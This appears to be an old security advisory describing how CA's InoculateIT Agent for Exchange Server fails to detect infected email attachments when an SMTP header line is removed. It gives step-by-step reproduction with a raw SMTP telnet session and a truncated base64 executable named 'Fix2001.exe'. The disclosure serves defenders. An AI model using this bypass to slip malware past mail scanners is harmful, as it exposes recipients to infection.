COMMAND

    CA's InoculateIT

SYSTEMS AFFECTED

    CA's InoculateIT Agent for Exchange Server

PROBLEM

    Hugo  Caye  found  following.   The  CA's  InoculateIT  Agent  for
    Exchange Server  cannot detect  some messages  that have  the SMTP
    headers  changed.   In  October/1999  he  reported  it to local CA
    support  office,  but  still  now  nothing  have  done.   Guys  at
    inoc-nt@ca.com seem to ignore his messages.

    The bug can easily be  demonstrated telneting on tcp/25 against  a
    EX Srvr with IMC (the  MS SMTP connector/service).  Simply  change
    some  SMTP  headers  and  the  CA's  AVEX  Agent neither opens the
    attached file  that is  infected.   It is  not a  signature issue,
    since we can also send the CA's virtest.com sample file.  Any file
    can be send, since the AVEX Agent doesn't recognize the message as
    having an attached file.

    Something like that can be easily done:
    1. Get  a message  containing any  infected attached  MIME encoded
       file.  Hugo  simply filtered out  via EX to  C:\TurfDir sending
       from outside to EX;
    2. Edit  the  file  (I  used  MS Notepad.exe) and just remove  the
       "From:  ..." line from the SMTP header. Something like this:

        ==>> Remove this line: From: Test <Test@abc.com.br>
        To: Hugo Caye <Hugo@xyz.com.br>
        Subject: Test
        Date: Mon, 23 Oct 2000 10:59:53 -0200
        MIME-Version: 1.0
        X-Mailer: Internet Mail Service (5.5.2650.21)
        Content-Type: application/x-msdownload;
	        name="Fix2001.exe"
        Content-Transfer-Encoding: base64
        Content-Disposition: attachment;
	        filename="Fix2001.exe"
        
        TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
        aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
        1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
        AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed the rest here;

    3. Copy the Notepad content to clipboard;
    4. Issue "telnet your_exsrvr 25" command:

        220 aaa.xyz.com.br ESMTP Server (Microsoft Exchange Internet Mail
        Service 5.5.2650.21) ready
        helo
        250 OK
        mail from:<>
        250 OK - mail from <>
        rcpt to:<hugo@xyz.com.br>
        250 OK - Recipient <hugo@xyz.com.br>
        data
        354 Send data.  End with CRLF.CRLF
        
        ==>> Here, paste from clipboard (Win2K, just a mouse right-click).
        Something like this:
        
        To: Hugo Caye <Hugo@xyz.com.br>
        Subject: Test
        Date: Mon, 23 Oct 2000 10:59:53 -0200
        MIME-Version: 1.0
        X-Mailer: Internet Mail Service (5.5.2650.21)
        Content-Type: application/x-msdownload;
                name="Fix2001.exe"
        Content-Transfer-Encoding: base64
        Content-Disposition: attachment;
                filename="Fix2001.exe"
        
        TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
        aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
        1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
        AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed...
        ....AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        
        
        .
        250 OK
        quit
        221 closing connection

    5. Message sent, CA's Agent will not detect the infected file.

    This is one manner to exploit the Agent.  There are at least  more
    two holes.

    We are not talking about  the weaknesses of embedded messages  and
    server based rules.

SOLUTION

    Both big holes recognized by CA.